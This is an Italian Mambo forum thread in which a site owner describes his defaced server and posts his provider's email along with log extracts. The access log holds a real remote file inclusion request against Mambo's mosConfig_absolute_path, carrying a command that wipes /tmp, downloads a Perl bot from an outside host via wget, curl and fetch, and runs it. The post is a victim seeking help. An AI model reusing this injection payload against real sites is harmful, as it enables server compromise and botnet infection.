Analisi di un delitto! - Mambo

jeyjey · July 11th, 2006, 03:05

Analisi di un delitto. Da una settimana il mio v-server è fermo, disguidi tecnici perchè Areaserver Energit) ha poco personale e i sistemisti non parlano con il call center e quindi non sai quello che fare fino a che non t'incazzi. Alla fine mi hanno mandato una mail con l'estratto del log. Un attimino, facciamo il punto. Apro un mio sito (mambo 454 italiano) e ci trovo una musichetta Araba del ca**o con una pagina verde dove dei "Muslim" avevano reso il mio sito OWNED. Areaserver taceva e "vedremo cosa si può fare" era il minimo. Poi gli altri siti mambo. Dopo sono andato in giro in questo forum ed ho cercato "attack" ed ho analizzato la situazione che non è molto rosea. Il fatto che nessuno ci abbia mai perforato dipende anche dal fatto che non sanno che il nostro sito è in mambo e che alcuni permessi siano a 777. Se c'è una falla in un codice questi se ne impadroniscono subito (777 su components). Qui sotto c'è un estratto del log. Sembra che il server si richiamasse dei file da altri siti riempiendo il server di mmonnezza. Il codice di partenza era Simpleboard e Extcal. Quindi il minimo era disabilitare i suddetti componenti e mettere tutto a 755. Certo che è una bella balla mettere a 755. Praticamente non puoi fare molto se non scrivere alcuni articoli di testo. Quindi se i componenti non vengono attaccati e sembra essere tutto perfetto è che non siamo stati presi di mira. C'è qualcuno che sa interpretare quanto riportato qui sotto? Io ho provato a vedere cosa ci fosse agli ip riportati, ma ho trovato siti, secondo me, ignari della cosa. ThePrincy, che ci capisci tu? E poi, quei bugh che riporti sul sito dove li rimedi? In quale sito ti documenti? Siamo sicuri che Mamboboard ed EXTcalendar (dopo il consiglio di theprincy) sono ora blindati? O forse è meglio un buon prodotto a pagamento? Vediamo se ci si capisce qualcosa dai ragazzi!

Segue e-mail del provider:

Il vs è stato violato a causa di una versione di Mambo bacata presente nei
seguenti path

/home/web/xxxxxxxxxxxxxxxxxxxxxxx.it/website/
/home/web/www.xxxxxxxxxxxxxxx.it/website/
/home/web/www.xxxxxxxxxxxxx.com/website/

E' necessario quindi aggiornare le 3 versioni di Mambo e ricontattarci per la riabilitazione del server web.

Estratto access_Log

24.215.43.90 - - [08/Jul/2006:23:16:43 +0200] "GET
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST
%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=ht tp://bbs.mbig.cn/tool.gif?&cmd=cd
%20/tmp/;rm%20-rf%20*;fetch%20http://bbs.mbig.cn/b0t.tmp;wget%20http://bbs.mbig.cn/b0t.tmp;curl%20
-O%20http://bbs.mbig.cn/b0t.tmp;perl%20b0t.tmp;perl%20b0t.tmp.1;perl%20b0t .tmp.2;
lwp-download
%20http://bbs.mbig.cn/
b0t.tmp%20/tmp/b0t.tmps;perl%20b0t.tmps?
HTTP/1.0" 200 16 "-" "Mozilla/5.0"
24.215.43.90 - - [08/Jul/2006:23:16:43 +0200] "GET
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST%
5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=htt p://bbs.mbig.cn/tool.gif?&cmd=cd%20/tmp/;rm%20-rf%20*;
fetch%20http://bbs.mbig.cn/b0t.tmp;wget%20http://bbs.mbig.cn/b0t.tmp;curl%20-O%20http://bbs.mbig.cn/b0t.tmp;
perl%20b0t.tmp;perl%20b0t.tmp.1;perl%20b0t.tmp.2;l wp-download%20http://bbs.mbig.cn/b0t.tmp%20/tmp/b0t.tmps;
perl%20b0t.tmps?
HTTP/1.0" 200 16

Estratto error_log

--23:10:15-- http://200.250.97.142/simpleboard.txt
=> `simpleboard.txt'
Connecting to 200.250.97.142:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,581 [text/plain]

0K .......... .......... ........ 100% 19.43
KB/s

23:10:17 (19.43 KB/s) - `simpleboard.txt' saved [29581/29581]

Per informazioni il nostro Staff è a sua completa disposizione all'indirizzo
areaserver@energit.it oppure chiamando il Servizio Clienti al numero gratuito
800.1922.22 tutti i giorni dalle 9 alle 21.

Grazie per aver scelto Energit!

Cordiali saluti,

jeyjey · July 11th, 2006, 03:16

Quote:

Originally Posted by jeyjey

Estratto error_log

--23:10:15-- http://200.250.97.142/simpleboard.txt
=> `simpleboard.txt'
Connecting to 200.250.97.142:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,581 [text/plain]

0K .......... .......... ........ 100% 19.43
KB/s

23:10:17 (19.43 KB/s) - `simpleboard.txt' saved [29581/29581]

Per informazioni il nostro Staff è a sua completa disposizione all'indirizzo
areaserver@energit.it oppure chiamando il Servizio Clienti al numero gratuito
800.1922.22 tutti i giorni dalle 9 alle 21.

Grazie per aver scelto Energit!

Cordiali saluti,
[/color]

Provate a connettervi al link suddetto. Appare un listato il perl, quindi eseguibile dal server che non ho capito cosa faccia. E' interessante vedere come tali server siano online. Mi piacerebbe sapere dove è ubicato il fatidico:
200.250.97.142. Allora che faccio vado a vedere di cosa si tratta. E quindi compare la polizia municipale di una cittadina portoghese.

July 11th, 2006, 03:05	#1
jeyjey Join Date: Jun 2005 Location: Firenze -- Chianti Posts: 110	Analisi di un delitto! Analisi di un delitto. Da una settimana il mio v-server è fermo, disguidi tecnici perchè Areaserver Energit) ha poco personale e i sistemisti non parlano con il call center e quindi non sai quello che fare fino a che non t'incazzi. Alla fine mi hanno mandato una mail con l'estratto del log. Un attimino, facciamo il punto. Apro un mio sito (mambo 454 italiano) e ci trovo una musichetta Araba del ca*o con una pagina verde dove dei "Muslim" avevano reso il mio sito OWNED. Areaserver taceva e "vedremo cosa si può fare" era il minimo. Poi gli altri siti mambo. Dopo sono andato in giro in questo forum ed ho cercato "attack" ed ho analizzato la situazione che non è molto rosea. Il fatto che nessuno ci abbia mai perforato dipende anche dal fatto che non sanno che il nostro sito è in mambo e che alcuni permessi siano a 777. Se c'è una falla in un codice questi se ne impadroniscono subito (777 su components). Qui sotto c'è un estratto del log. Sembra che il server si richiamasse dei file da altri siti riempiendo il server di mmonnezza. Il codice di partenza era Simpleboard e Extcal. Quindi il minimo era disabilitare i suddetti componenti e mettere tutto a 755. Certo che è una bella balla mettere a 755. Praticamente non puoi fare molto se non scrivere alcuni articoli di testo. Quindi se i componenti non vengono attaccati e sembra essere tutto perfetto è che non siamo stati presi di mira. C'è qualcuno che sa interpretare quanto riportato qui sotto? Io ho provato a vedere cosa ci fosse agli ip riportati, ma ho trovato siti, secondo me, ignari della cosa. ThePrincy, che ci capisci tu? E poi, quei bugh che riporti sul sito dove li rimedi? In quale sito ti documenti? Siamo sicuri che Mamboboard ed EXTcalendar (dopo il consiglio di theprincy) sono ora blindati? O forse è meglio un buon prodotto a pagamento? Vediamo se ci si capisce qualcosa dai ragazzi! Segue e-mail del provider: Il vs è stato violato a causa di una versione di Mambo bacata presente nei seguenti path /home/web/xxxxxxxxxxxxxxxxxxxxxxx.it/website/ /home/web/www.xxxxxxxxxxxxxxx.it/website/ /home/web/www.xxxxxxxxxxxxx.com/website/ E' necessario quindi aggiornare le 3 versioni di Mambo e ricontattarci per la riabilitazione del server web. Estratto access_Log 24.215.43.90 - - [08/Jul/2006:23:16:43 +0200] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST %5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=ht tp://bbs.mbig.cn/tool.gif?&cmd=cd %20/tmp/;rm%20-rf%20;fetch%20http://bbs.mbig.cn/b0t.tmp;wget%20http://bbs.mbig.cn/b0t.tmp;curl%20 -O%20http://bbs.mbig.cn/b0t.tmp;perl%20b0t.tmp;perl%20b0t.tmp.1;perl%20b0t .tmp.2; lwp-download %20http://bbs.mbig.cn/ b0t.tmp%20/tmp/b0t.tmps;perl%20b0t.tmps? HTTP/1.0" 200 16 "-" "Mozilla/5.0" 24.215.43.90 - - [08/Jul/2006:23:16:43 +0200] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST% 5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=htt p://bbs.mbig.cn/tool.gif?&cmd=cd%20/tmp/;rm%20-rf%20; fetch%20http://bbs.mbig.cn/b0t.tmp;wget%20http://bbs.mbig.cn/b0t.tmp;curl%20-O%20http://bbs.mbig.cn/b0t.tmp; perl%20b0t.tmp;perl%20b0t.tmp.1;perl%20b0t.tmp.2;l wp-download%20http://bbs.mbig.cn/b0t.tmp%20/tmp/b0t.tmps; perl%20b0t.tmps? HTTP/1.0" 200 16 Estratto error_log --23:10:15-- http://200.250.97.142/simpleboard.txt => `simpleboard.txt' Connecting to 200.250.97.142:80... connected. HTTP request sent, awaiting response... 200 OK Length: 29,581 [text/plain] 0K .......... .......... ........ 100% 19.43 KB/s 23:10:17 (19.43 KB/s) - `simpleboard.txt' saved [29581/29581] Per informazioni il nostro Staff è a sua completa disposizione all'indirizzo areaserver@energit.it oppure chiamando il Servizio Clienti al numero gratuito 800.1922.22 tutti i giorni dalle 9 alle 21. Grazie per aver scelto Energit! Cordiali saluti, __________________ Morti cristi ... spenti lumi.* Last edited by jeyjey : July 11th, 2006 at 03:10.

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode